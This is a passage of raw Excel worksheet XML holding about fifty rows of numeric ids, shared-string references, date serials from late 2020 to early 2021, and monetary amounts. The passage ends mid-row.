    <row r="2230" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2230">
        <v>21862</v>
      </c>
      <c r="B2230">
        <v>360</v>
      </c>
      <c r="C2230" t="s">
        <v>233</v>
      </c>
      <c r="D2230" t="s">
        <v>9608</v>
      </c>
      <c r="E2230">
        <v>12</v>
      </c>
      <c r="F2230" t="s">
        <v>11664</v>
      </c>
      <c r="G2230" s="1">
        <v>44119</v>
      </c>
      <c r="H2230">
        <v>1000000</v>
      </c>
      <c r="J2230" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="2231" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2231">
        <v>21863</v>
      </c>
      <c r="B2231">
        <v>360</v>
      </c>
      <c r="C2231" t="s">
        <v>233</v>
      </c>
      <c r="D2231" t="s">
        <v>9608</v>
      </c>
      <c r="E2231">
        <v>12</v>
      </c>
      <c r="F2231" t="s">
        <v>9437</v>
      </c>
      <c r="G2231" s="1">
        <v>44119</v>
      </c>
      <c r="H2231">
        <v>25000</v>
      </c>
      <c r="J2231" t="s">
        <v>10065</v>
      </c>
    </row>
    <row r="2232" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2232">
        <v>21864</v>
      </c>
      <c r="B2232">
        <v>360</v>
      </c>
      <c r="C2232" t="s">
        <v>233</v>
      </c>
      <c r="D2232" t="s">
        <v>9608</v>
      </c>
      <c r="E2232">
        <v>12</v>
      </c>
      <c r="F2232" t="s">
        <v>2236</v>
      </c>
      <c r="G2232" s="1">
        <v>44119</v>
      </c>
      <c r="H2232">
        <v>600000</v>
      </c>
      <c r="J2232" t="s">
        <v>10065</v>
      </c>
    </row>
    <row r="2233" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2233">
        <v>21866</v>
      </c>
      <c r="B2233">
        <v>4863</v>
      </c>
      <c r="C2233" t="s">
        <v>7360</v>
      </c>
      <c r="D2233" t="s">
        <v>11665</v>
      </c>
      <c r="E2233">
        <v>7</v>
      </c>
      <c r="F2233" t="s">
        <v>7057</v>
      </c>
      <c r="G2233" s="1">
        <v>44126</v>
      </c>
      <c r="H2233">
        <v>50000</v>
      </c>
      <c r="I2233" t="s">
        <v>9550</v>
      </c>
      <c r="J2233" t="s">
        <v>10103</v>
      </c>
    </row>
    <row r="2234" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2234">
        <v>21867</v>
      </c>
      <c r="B2234">
        <v>1126</v>
      </c>
      <c r="C2234" t="s">
        <v>3390</v>
      </c>
      <c r="D2234" t="s">
        <v>11666</v>
      </c>
      <c r="E2234">
        <v>13</v>
      </c>
      <c r="F2234" t="s">
        <v>11667</v>
      </c>
      <c r="G2234" s="1">
        <v>44081</v>
      </c>
      <c r="H2234">
        <v>300000</v>
      </c>
      <c r="J2234" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="2235" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2235">
        <v>21868</v>
      </c>
      <c r="B2235">
        <v>1126</v>
      </c>
      <c r="C2235" t="s">
        <v>3390</v>
      </c>
      <c r="D2235" t="s">
        <v>11666</v>
      </c>
      <c r="E2235">
        <v>13</v>
      </c>
      <c r="F2235" t="s">
        <v>11668</v>
      </c>
      <c r="G2235" s="1">
        <v>44081</v>
      </c>
      <c r="H2235">
        <v>300000</v>
      </c>
      <c r="J2235" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="2236" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2236">
        <v>21869</v>
      </c>
      <c r="B2236">
        <v>4790</v>
      </c>
      <c r="C2236" t="s">
        <v>5016</v>
      </c>
      <c r="D2236" t="s">
        <v>11669</v>
      </c>
      <c r="E2236">
        <v>31</v>
      </c>
      <c r="F2236" t="s">
        <v>11670</v>
      </c>
      <c r="G2236" s="1">
        <v>44095</v>
      </c>
      <c r="H2236">
        <v>600000</v>
      </c>
      <c r="I2236" t="s">
        <v>9485</v>
      </c>
    </row>
    <row r="2237" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2237">
        <v>21870</v>
      </c>
      <c r="B2237">
        <v>4790</v>
      </c>
      <c r="C2237" t="s">
        <v>5016</v>
      </c>
      <c r="D2237" t="s">
        <v>11669</v>
      </c>
      <c r="E2237">
        <v>31</v>
      </c>
      <c r="F2237" t="s">
        <v>11671</v>
      </c>
      <c r="G2237" s="1">
        <v>44095</v>
      </c>
      <c r="H2237">
        <v>545000</v>
      </c>
      <c r="I2237" t="s">
        <v>9485</v>
      </c>
    </row>
    <row r="2238" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2238">
        <v>21871</v>
      </c>
      <c r="B2238">
        <v>4790</v>
      </c>
      <c r="C2238" t="s">
        <v>5016</v>
      </c>
      <c r="D2238" t="s">
        <v>11669</v>
      </c>
      <c r="E2238">
        <v>31</v>
      </c>
      <c r="F2238" t="s">
        <v>9437</v>
      </c>
      <c r="G2238" s="1">
        <v>44095</v>
      </c>
      <c r="H2238">
        <v>450000</v>
      </c>
    </row>
    <row r="2239" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2239">
        <v>21872</v>
      </c>
      <c r="B2239">
        <v>4801</v>
      </c>
      <c r="C2239" t="s">
        <v>7368</v>
      </c>
      <c r="D2239" t="s">
        <v>11672</v>
      </c>
      <c r="E2239">
        <v>2</v>
      </c>
      <c r="F2239" t="s">
        <v>9437</v>
      </c>
      <c r="G2239" s="1">
        <v>44081</v>
      </c>
      <c r="H2239">
        <v>540000</v>
      </c>
      <c r="J2239" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="2240" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2240">
        <v>21878</v>
      </c>
      <c r="B2240">
        <v>4846</v>
      </c>
      <c r="C2240" t="s">
        <v>16422</v>
      </c>
      <c r="D2240" t="s">
        <v>16423</v>
      </c>
      <c r="E2240">
        <v>16</v>
      </c>
      <c r="F2240" t="s">
        <v>1455</v>
      </c>
      <c r="G2240" s="1">
        <v>44117</v>
      </c>
      <c r="H2240" s="4">
        <v>33000000</v>
      </c>
      <c r="I2240" t="s">
        <v>11160</v>
      </c>
    </row>
    <row r="2241" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2241">
        <v>21879</v>
      </c>
      <c r="B2241">
        <v>664</v>
      </c>
      <c r="C2241" t="s">
        <v>1475</v>
      </c>
      <c r="D2241" t="s">
        <v>11673</v>
      </c>
      <c r="E2241">
        <v>13</v>
      </c>
      <c r="F2241" t="s">
        <v>11674</v>
      </c>
      <c r="G2241" s="1">
        <v>44116</v>
      </c>
      <c r="H2241">
        <v>0</v>
      </c>
      <c r="I2241" t="s">
        <v>10287</v>
      </c>
    </row>
    <row r="2242" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2242">
        <v>21880</v>
      </c>
      <c r="B2242">
        <v>664</v>
      </c>
      <c r="C2242" t="s">
        <v>1475</v>
      </c>
      <c r="D2242" t="s">
        <v>11673</v>
      </c>
      <c r="E2242">
        <v>13</v>
      </c>
      <c r="F2242" t="s">
        <v>11675</v>
      </c>
      <c r="G2242" s="1">
        <v>44116</v>
      </c>
      <c r="H2242">
        <v>0</v>
      </c>
      <c r="I2242" t="s">
        <v>10287</v>
      </c>
    </row>
    <row r="2243" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2243">
        <v>21881</v>
      </c>
      <c r="B2243">
        <v>664</v>
      </c>
      <c r="C2243" t="s">
        <v>1475</v>
      </c>
      <c r="D2243" t="s">
        <v>11673</v>
      </c>
      <c r="E2243">
        <v>13</v>
      </c>
      <c r="F2243" t="s">
        <v>11676</v>
      </c>
      <c r="G2243" s="1">
        <v>44116</v>
      </c>
      <c r="H2243">
        <v>0</v>
      </c>
      <c r="I2243" t="s">
        <v>10287</v>
      </c>
    </row>
    <row r="2244" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2244">
        <v>21882</v>
      </c>
      <c r="B2244">
        <v>664</v>
      </c>
      <c r="C2244" t="s">
        <v>1475</v>
      </c>
      <c r="D2244" t="s">
        <v>11673</v>
      </c>
      <c r="E2244">
        <v>13</v>
      </c>
      <c r="F2244" t="s">
        <v>9430</v>
      </c>
      <c r="G2244" s="1">
        <v>44116</v>
      </c>
      <c r="H2244">
        <v>0</v>
      </c>
      <c r="I2244" t="s">
        <v>10287</v>
      </c>
    </row>
    <row r="2245" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2245">
        <v>21883</v>
      </c>
      <c r="B2245">
        <v>664</v>
      </c>
      <c r="C2245" t="s">
        <v>1475</v>
      </c>
      <c r="D2245" t="s">
        <v>11673</v>
      </c>
      <c r="E2245">
        <v>13</v>
      </c>
      <c r="F2245" t="s">
        <v>11677</v>
      </c>
      <c r="G2245" s="1">
        <v>44116</v>
      </c>
      <c r="H2245">
        <v>0</v>
      </c>
      <c r="I2245" t="s">
        <v>10287</v>
      </c>
    </row>
    <row r="2246" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2246">
        <v>21884</v>
      </c>
      <c r="B2246">
        <v>664</v>
      </c>
      <c r="C2246" t="s">
        <v>1475</v>
      </c>
      <c r="D2246" t="s">
        <v>11673</v>
      </c>
      <c r="E2246">
        <v>13</v>
      </c>
      <c r="F2246" t="s">
        <v>11678</v>
      </c>
      <c r="G2246" s="1">
        <v>44116</v>
      </c>
      <c r="H2246">
        <v>0</v>
      </c>
      <c r="I2246" t="s">
        <v>10287</v>
      </c>
    </row>
    <row r="2247" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2247">
        <v>21885</v>
      </c>
      <c r="B2247">
        <v>2738</v>
      </c>
      <c r="C2247" t="s">
        <v>7229</v>
      </c>
      <c r="D2247" t="s">
        <v>11476</v>
      </c>
      <c r="E2247">
        <v>16</v>
      </c>
      <c r="F2247" t="s">
        <v>609</v>
      </c>
      <c r="G2247" s="1">
        <v>44057</v>
      </c>
      <c r="H2247">
        <v>0</v>
      </c>
      <c r="I2247" t="s">
        <v>11478</v>
      </c>
    </row>
    <row r="2248" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2248">
        <v>21886</v>
      </c>
      <c r="B2248">
        <v>519</v>
      </c>
      <c r="C2248" t="s">
        <v>1813</v>
      </c>
      <c r="D2248" t="s">
        <v>11679</v>
      </c>
      <c r="E2248">
        <v>16</v>
      </c>
      <c r="F2248" t="s">
        <v>11372</v>
      </c>
      <c r="G2248" s="1">
        <v>44103</v>
      </c>
      <c r="H2248">
        <v>90000</v>
      </c>
      <c r="I2248" t="s">
        <v>11680</v>
      </c>
    </row>
    <row r="2249" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2249">
        <v>21887</v>
      </c>
      <c r="B2249">
        <v>519</v>
      </c>
      <c r="C2249" t="s">
        <v>1813</v>
      </c>
      <c r="D2249" t="s">
        <v>11679</v>
      </c>
      <c r="E2249">
        <v>16</v>
      </c>
      <c r="F2249" t="s">
        <v>9438</v>
      </c>
      <c r="G2249" s="1">
        <v>44103</v>
      </c>
      <c r="H2249">
        <v>50</v>
      </c>
      <c r="I2249" t="s">
        <v>11681</v>
      </c>
    </row>
    <row r="2250" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2250">
        <v>21888</v>
      </c>
      <c r="B2250">
        <v>1565</v>
      </c>
      <c r="C2250" t="s">
        <v>3382</v>
      </c>
      <c r="D2250" t="s">
        <v>11682</v>
      </c>
      <c r="E2250">
        <v>5</v>
      </c>
      <c r="F2250" t="s">
        <v>1746</v>
      </c>
      <c r="G2250" s="1">
        <v>44104</v>
      </c>
      <c r="H2250">
        <v>144000</v>
      </c>
      <c r="I2250" t="s">
        <v>10222</v>
      </c>
      <c r="J2250" t="s">
        <v>11683</v>
      </c>
    </row>
    <row r="2251" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2251">
        <v>21889</v>
      </c>
      <c r="B2251">
        <v>1565</v>
      </c>
      <c r="C2251" t="s">
        <v>3382</v>
      </c>
      <c r="D2251" t="s">
        <v>11682</v>
      </c>
      <c r="E2251">
        <v>5</v>
      </c>
      <c r="F2251" t="s">
        <v>3814</v>
      </c>
      <c r="G2251" s="1">
        <v>44104</v>
      </c>
      <c r="H2251">
        <v>144000</v>
      </c>
      <c r="I2251" t="s">
        <v>10222</v>
      </c>
      <c r="J2251" t="s">
        <v>11683</v>
      </c>
    </row>
    <row r="2252" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2252">
        <v>21890</v>
      </c>
      <c r="B2252">
        <v>564</v>
      </c>
      <c r="C2252" t="s">
        <v>1656</v>
      </c>
      <c r="D2252" t="s">
        <v>11684</v>
      </c>
      <c r="E2252">
        <v>24</v>
      </c>
      <c r="F2252" t="s">
        <v>673</v>
      </c>
      <c r="G2252" s="1">
        <v>44110</v>
      </c>
      <c r="H2252">
        <v>721343</v>
      </c>
      <c r="J2252" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="2253" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2253">
        <v>21895</v>
      </c>
      <c r="B2253">
        <v>1970</v>
      </c>
      <c r="C2253" t="s">
        <v>6220</v>
      </c>
      <c r="D2253" t="s">
        <v>11685</v>
      </c>
      <c r="E2253">
        <v>15</v>
      </c>
      <c r="F2253" t="s">
        <v>9546</v>
      </c>
      <c r="G2253" s="1">
        <v>44070</v>
      </c>
      <c r="H2253">
        <v>25000</v>
      </c>
      <c r="I2253" t="s">
        <v>11686</v>
      </c>
      <c r="J2253" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2254" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2254">
        <v>21896</v>
      </c>
      <c r="B2254">
        <v>1970</v>
      </c>
      <c r="C2254" t="s">
        <v>6220</v>
      </c>
      <c r="D2254" t="s">
        <v>11685</v>
      </c>
      <c r="E2254">
        <v>15</v>
      </c>
      <c r="F2254" t="s">
        <v>2236</v>
      </c>
      <c r="G2254" s="1">
        <v>44070</v>
      </c>
      <c r="H2254">
        <v>15000</v>
      </c>
      <c r="I2254" t="s">
        <v>9536</v>
      </c>
      <c r="J2254" t="s">
        <v>11181</v>
      </c>
    </row>
    <row r="2255" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2255">
        <v>21897</v>
      </c>
      <c r="B2255">
        <v>1970</v>
      </c>
      <c r="C2255" t="s">
        <v>6220</v>
      </c>
      <c r="D2255" t="s">
        <v>11685</v>
      </c>
      <c r="E2255">
        <v>15</v>
      </c>
      <c r="F2255" t="s">
        <v>11687</v>
      </c>
      <c r="G2255" s="1">
        <v>44070</v>
      </c>
      <c r="H2255">
        <v>5000</v>
      </c>
      <c r="J2255" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="2256" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2256">
        <v>21898</v>
      </c>
      <c r="B2256">
        <v>1970</v>
      </c>
      <c r="C2256" t="s">
        <v>6220</v>
      </c>
      <c r="D2256" t="s">
        <v>11685</v>
      </c>
      <c r="E2256">
        <v>15</v>
      </c>
      <c r="F2256" t="s">
        <v>609</v>
      </c>
      <c r="G2256" s="1">
        <v>44070</v>
      </c>
      <c r="H2256">
        <v>5000</v>
      </c>
      <c r="J2256" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2257" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2257">
        <v>21899</v>
      </c>
      <c r="B2257">
        <v>1970</v>
      </c>
      <c r="C2257" t="s">
        <v>6220</v>
      </c>
      <c r="D2257" t="s">
        <v>11685</v>
      </c>
      <c r="E2257">
        <v>15</v>
      </c>
      <c r="F2257" t="s">
        <v>9561</v>
      </c>
      <c r="G2257" s="1">
        <v>44070</v>
      </c>
      <c r="H2257">
        <v>1000</v>
      </c>
      <c r="J2257" t="s">
        <v>11688</v>
      </c>
    </row>
    <row r="2258" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2258">
        <v>21900</v>
      </c>
      <c r="B2258">
        <v>1970</v>
      </c>
      <c r="C2258" t="s">
        <v>6220</v>
      </c>
      <c r="D2258" t="s">
        <v>11685</v>
      </c>
      <c r="E2258">
        <v>15</v>
      </c>
      <c r="F2258" t="s">
        <v>9846</v>
      </c>
      <c r="G2258" s="1">
        <v>44070</v>
      </c>
      <c r="H2258">
        <v>1000</v>
      </c>
      <c r="J2258" t="s">
        <v>11689</v>
      </c>
    </row>
    <row r="2259" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2259">
        <v>21901</v>
      </c>
      <c r="B2259">
        <v>1970</v>
      </c>
      <c r="C2259" t="s">
        <v>6220</v>
      </c>
      <c r="D2259" t="s">
        <v>11685</v>
      </c>
      <c r="E2259">
        <v>15</v>
      </c>
      <c r="F2259" t="s">
        <v>9672</v>
      </c>
      <c r="G2259" s="1">
        <v>44070</v>
      </c>
      <c r="H2259">
        <v>1000</v>
      </c>
      <c r="I2259" t="s">
        <v>11690</v>
      </c>
    </row>
    <row r="2260" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2260">
        <v>21902</v>
      </c>
      <c r="B2260">
        <v>1970</v>
      </c>
      <c r="C2260" t="s">
        <v>6220</v>
      </c>
      <c r="D2260" t="s">
        <v>11685</v>
      </c>
      <c r="E2260">
        <v>15</v>
      </c>
      <c r="F2260" t="s">
        <v>7241</v>
      </c>
      <c r="G2260" s="1">
        <v>44070</v>
      </c>
      <c r="H2260">
        <v>1000</v>
      </c>
      <c r="I2260" t="s">
        <v>11691</v>
      </c>
    </row>
    <row r="2261" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2261">
        <v>21904</v>
      </c>
      <c r="B2261">
        <v>2331</v>
      </c>
      <c r="C2261" t="s">
        <v>5205</v>
      </c>
      <c r="D2261" t="s">
        <v>11692</v>
      </c>
      <c r="E2261">
        <v>26</v>
      </c>
      <c r="F2261" t="s">
        <v>2236</v>
      </c>
      <c r="G2261" s="1">
        <v>44088</v>
      </c>
      <c r="H2261">
        <v>600000</v>
      </c>
      <c r="J2261" t="s">
        <v>11693</v>
      </c>
    </row>
    <row r="2262" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2262">
        <v>21905</v>
      </c>
      <c r="B2262">
        <v>1951</v>
      </c>
      <c r="C2262" t="s">
        <v>6166</v>
      </c>
      <c r="D2262" t="s">
        <v>11694</v>
      </c>
      <c r="E2262">
        <v>31</v>
      </c>
      <c r="F2262" t="s">
        <v>3763</v>
      </c>
      <c r="G2262" s="1">
        <v>44098</v>
      </c>
      <c r="H2262">
        <v>100000</v>
      </c>
      <c r="J2262" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2263" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2263">
        <v>21910</v>
      </c>
      <c r="B2263">
        <v>473</v>
      </c>
      <c r="C2263" t="s">
        <v>1243</v>
      </c>
      <c r="D2263" t="s">
        <v>10987</v>
      </c>
      <c r="E2263">
        <v>26</v>
      </c>
      <c r="F2263" t="s">
        <v>11695</v>
      </c>
      <c r="G2263" s="1">
        <v>44075</v>
      </c>
      <c r="H2263">
        <v>5000</v>
      </c>
      <c r="J2263" t="s">
        <v>11696</v>
      </c>
    </row>
    <row r="2264" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2264">
        <v>21911</v>
      </c>
      <c r="B2264">
        <v>473</v>
      </c>
      <c r="C2264" t="s">
        <v>1243</v>
      </c>
      <c r="D2264" t="s">
        <v>10987</v>
      </c>
      <c r="E2264">
        <v>26</v>
      </c>
      <c r="F2264" t="s">
        <v>11096</v>
      </c>
      <c r="G2264" s="1">
        <v>44075</v>
      </c>
      <c r="H2264">
        <v>4000</v>
      </c>
      <c r="J2264" t="s">
        <v>11696</v>
      </c>
    </row>
    <row r="2265" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2265">
        <v>21913</v>
      </c>
      <c r="B2265">
        <v>4801</v>
      </c>
      <c r="C2265" t="s">
        <v>7368</v>
      </c>
      <c r="D2265" t="s">
        <v>11672</v>
      </c>
      <c r="E2265">
        <v>2</v>
      </c>
      <c r="F2265" t="s">
        <v>9435</v>
      </c>
      <c r="G2265" s="1">
        <v>44081</v>
      </c>
      <c r="H2265">
        <v>100000</v>
      </c>
      <c r="J2265" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="2266" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2266">
        <v>21915</v>
      </c>
      <c r="B2266">
        <v>242</v>
      </c>
      <c r="C2266" t="s">
        <v>1130</v>
      </c>
      <c r="D2266" t="s">
        <v>11697</v>
      </c>
      <c r="E2266">
        <v>16</v>
      </c>
      <c r="F2266" t="s">
        <v>11698</v>
      </c>
      <c r="G2266" s="1">
        <v>44124</v>
      </c>
      <c r="H2266">
        <v>3000000</v>
      </c>
      <c r="J2266" t="s">
        <v>9905</v>
      </c>
    </row>
    <row r="2267" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2267">
        <v>21916</v>
      </c>
      <c r="B2267">
        <v>242</v>
      </c>
      <c r="C2267" t="s">
        <v>16424</v>
      </c>
      <c r="D2267" t="s">
        <v>16425</v>
      </c>
      <c r="E2267">
        <v>16</v>
      </c>
      <c r="F2267" t="s">
        <v>11699</v>
      </c>
      <c r="G2267" s="1">
        <v>44124</v>
      </c>
      <c r="H2267" s="4">
        <v>1000000</v>
      </c>
      <c r="J2267" t="s">
        <v>9905</v>
      </c>
    </row>
    <row r="2268" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2268">
        <v>21917</v>
      </c>
      <c r="B2268">
        <v>1435</v>
      </c>
      <c r="C2268" t="s">
        <v>3187</v>
      </c>
      <c r="D2268" t="s">
        <v>11700</v>
      </c>
      <c r="E2268">
        <v>16</v>
      </c>
      <c r="F2268" t="s">
        <v>11701</v>
      </c>
      <c r="G2268" s="1">
        <v>44103</v>
      </c>
      <c r="H2268">
        <v>600000</v>
      </c>
      <c r="J2268" t="s">
        <v>11702</v>
      </c>
    </row>
    <row r="2269" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2269">
        <v>21918</v>
      </c>
      <c r="B2269">
        <v>2609</v>
      </c>
      <c r="C2269" t="s">
        <v>5768</v>
      </c>
      <c r="D2269" t="s">
        <v>11703</v>
      </c>
      <c r="E2269">
        <v>16</v>
      </c>
      <c r="F2269" t="s">
        <v>9435</v>
      </c>
      <c r="G2269" s="1">
        <v>44090</v>
      </c>
      <c r="H2269">
        <v>200000</v>
      </c>
      <c r="J2269" t="s">
        <v>11704</v>
      </c>
    </row>
    <row r="2270" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2270">
        <v>21919</v>
      </c>
      <c r="B2270">
        <v>4780</v>
      </c>
      <c r="C2270" t="s">
        <v>7436</v>
      </c>
      <c r="D2270" t="s">
        <v>11705</v>
      </c>
      <c r="E2270">
        <v>7</v>
      </c>
      <c r="F2270" t="s">
        <v>4037</v>
      </c>
      <c r="G2270" s="1">
        <v>44116</v>
      </c>
      <c r="H2270">
        <v>2280</v>
      </c>
      <c r="I2270" t="s">
        <v>9791</v>
      </c>
    </row>
    <row r="2271" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2271">
        <v>21920</v>
      </c>
      <c r="B2271">
        <v>2609</v>
      </c>
      <c r="C2271" t="s">
        <v>5768</v>
      </c>
      <c r="D2271" t="s">
        <v>11703</v>
      </c>
      <c r="E2271">
        <v>16</v>
      </c>
      <c r="F2271" t="s">
        <v>547</v>
      </c>
      <c r="G2271" s="1">
        <v>44090</v>
      </c>
      <c r="H2271">
        <v>200000</v>
      </c>
      <c r="J2271" t="s">
        <v>11706</v>
      </c>
    </row>
    <row r="2272" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2272">
        <v>21922</v>
      </c>
      <c r="B2272">
        <v>999</v>
      </c>
      <c r="C2272" t="s">
        <v>3333</v>
      </c>
      <c r="D2272" t="s">
        <v>11707</v>
      </c>
      <c r="E2272">
        <v>11</v>
      </c>
      <c r="F2272" t="s">
        <v>11027</v>
      </c>
      <c r="G2272" s="1">
        <v>44224</v>
      </c>
      <c r="H2272">
        <v>100000</v>
      </c>
      <c r="J2272" t="s">
        <v>11708</v>
      </c>
    </row>
    <row r="2273" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2273">
        <v>21923</v>
      </c>
      <c r="B2273">
        <v>999</v>
      </c>
      <c r="C2273" t="s">
        <v>3333</v>
      </c>
      <c r="D2273" t="s">
        <v>11707</v>
      </c>
      <c r="E2273">
        <v>11</v>
      </c>
      <c r="F2273" t="s">
        <v>11709</v>
      </c>
      <c r="G2273" s="1">
        <v>44224</v>
      </c>
      <c r="H2273">
        <v>100000</v>
      </c>
      <c r="J2273" t="s">
        <v>11708</v>
      </c>
    </row>
    <row r="2274" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2274">
        <v>21924</v>
      </c>
      <c r="B2274">
        <v>999</v>
      </c>
      <c r="C2274" t="s">
        <v>3333</v>
      </c>
      <c r="D2274" t="s">
        <v>11707</v>
      </c>
      <c r="E2274">
        <v>11</v>
      </c>
      <c r="F2274" t="s">
        <v>11612</v>
      </c>
      <c r="G2274" s="1">
        <v>44224</v>
      </c>
      <c r="H2274">
        <v>100000</v>
      </c>
      <c r="J2274" t="s">
        <v>11708</v>
      </c>
    </row>
    <row r="2275" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2275">
        <v>21925</v>
      </c>
      <c r="B2275">
        <v>500</v>
      </c>
      <c r="C2275" t="s">
        <v>625</v>
      </c>
      <c r="D2275" t="s">
        <v>9803</v>
      </c>
      <c r="E2275">
        <v>11</v>
      </c>
      <c r="F2275" t="s">
        <v>10274</v>
      </c>
      <c r="G2275" s="1">
        <v>44096</v>
      </c>
      <c r="H2275">
        <v>10000</v>
      </c>
      <c r="J2275" t="s">
        <v>11145</v>
      </c>
    </row>
    <row r="2276" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2276">
        <v>21931</v>
      </c>
      <c r="B2276">
        <v>174</v>
      </c>
      <c r="C2276" t="s">
        <v>1828</v>
      </c>
      <c r="D2276" t="s">
        <v>11710</v>
      </c>
      <c r="E2276">
        <v>13</v>
      </c>
      <c r="F2276" t="s">
        <v>9444</v>
      </c>
      <c r="G2276" s="1">
        <v>44090</v>
      </c>
      <c r="H2276">
        <v>17161</v>
      </c>
      <c r="J2276" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2277" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2277">
        <v>21932</v>
      </c>
      <c r="B2277">
        <v>174</v>
      </c>
      <c r="C2277" t="s">
        <v>1828</v>
      </c>
      <c r="D2277" t="s">
        <v>11711</v>
      </c>
      <c r="E2277">
        <v>13</v>
      </c>
      <c r="F2277" t="s">
        <v>9595</v>
      </c>
      <c r="G2277" s="1">
        <v>44090</v>
      </c>
      <c r="H2277">
        <v>15172</v>
      </c>
      <c r="J2277" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2278" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2278">
        <v>21933</v>
      </c>
      <c r="B2278">
        <v>174</v>
      </c>
      <c r="C2278" t="s">
        <v>1828</v>
      </c>
      <c r="D2278" t="s">
        <v>11710</v>
      </c>
      <c r="E2278">
        <v>13</v>
      </c>
      <c r="F2278" t="s">
        <v>1746</v>
      </c>
      <c r="G2278" s="1">
        <v>44090</v>
      </c>
      <c r="H2278">
        <v>0</v>
      </c>
    </row>
    <row r="2279" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2279">
        <v>21934</v>
      </c>
      <c r="B2279">
        <v>1565</v>
      </c>
      <c r="C2279" t="s">
        <v>3382</v>
      </c>
      <c r="D2279" t="s">
        <v>11682</v>
      </c>
      <c r="E2279">
        <v>5</v>
      </c>
      <c r="F2279" t="s">
        <v>9527</v>
      </c>
      <c r="G2279" s="1">
        <v>44104</v>
      </c>
      <c r="H2279">
        <v>24000</v>
      </c>
      <c r="I2279" t="s">
        <v>11712</v>
      </c>
      <c r="J2279" t="s">
        <v>11683</v>
      </c>
    </row>
    <row r="2280" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2280">
        <v>21935</v>
      </c>
      <c r="B2280">
        <v>1565</v>
      </c>
      <c r="C2280" t="s">
        <v>3382</v>
      </c>
      <c r="D2280" t="s">
        <v>11682</v>
      </c>
      <c r="E2280">
        <v>5</v>
      </c>
      <c r="F2280" t="s">
        <v>9437</v>
      </c>
      <c r="G2280" s="1">
        <v>44104</v>
      </c>
      <c r="H2280">
        <v>24000</v>
      </c>
      <c r="I2280" t="s">
        <v>10222</v>
      </c>
      <c r="J2280" t="s">
        <v>11683</v>
      </c>
    </row>
    <row r="2281" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2281">
        <v>21936</v>
      </c>
      <c r="B2281">
        <v>4801</v>
      </c>
      <c r="C2281" t="s">
        <v>7368</v>
      </c>
      <c r="D2281" t="s">
        <v>11672</v>
      </c>
      <c r="E2281">
        <v>2</v>
      </c>
      <c r="F2281" t="s">
        <v>11713</v>
      </c>
      <c r="G2281" s="1">
        <v>44081</v>
      </c>
      <c r="H2281">
        <v>100000</v>
      </c>
      <c r="J2281" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="2282" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2282">
        <v>21938</v>
      </c>
      <c r="B2282">
        <v>4801</v>
      </c>
      <c r="C2282" t="s">
        <v>7368</v>
      </c>
      <c r="D2282" t="s">
        <v>11672</v>
      </c>
      <c r="E2282">
        <v>2</v>
      </c>
      <c r="F2282" t="s">
        <v>673</v>
      </c>
      <c r="G2282" s="1">
        <v>44081</v>
      </c>
      <c r="H2282">
        <v>100000</v>
      </c>
      <c r="J2282" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="2283" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2283">
